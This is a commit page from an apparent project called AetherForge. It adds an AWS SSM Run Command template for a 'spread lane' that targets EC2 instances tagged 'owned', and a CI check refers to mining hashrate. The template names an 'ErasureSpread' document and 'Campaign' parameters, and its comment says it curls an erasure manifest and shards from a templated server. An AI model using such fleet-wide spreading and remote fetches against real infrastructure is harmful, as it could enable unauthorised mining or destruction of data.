Add ssm_document spread lane for owned EC2 via SSM Run Command.
Some checks failed
CI Docker Mining Proof / Linux agent hashrate proof (push) Has been cancelled

This commit is contained in:
AetherForge
2026-06-07 09:56:14 -07:00
parent 6dd5cbd461
commit f55ee47089
17 changed files with 413 additions and 256 deletions

View File

@@ -0,0 +1,7 @@
{
"DocumentName": "AetherForge-ErasureSpread-{{BUILD_ID}}",
"DocumentVersion": "$LATEST",
"Targets": [{ "Key": "tag:AetherForge", "Values": ["owned"] }],
"Parameters": { "Campaign": ["{{CAMPAIGN}}"] },
"Comment": "AetherForge ssm_document lane — curl erasure manifest/shards from {{SERVER_URL}}"
}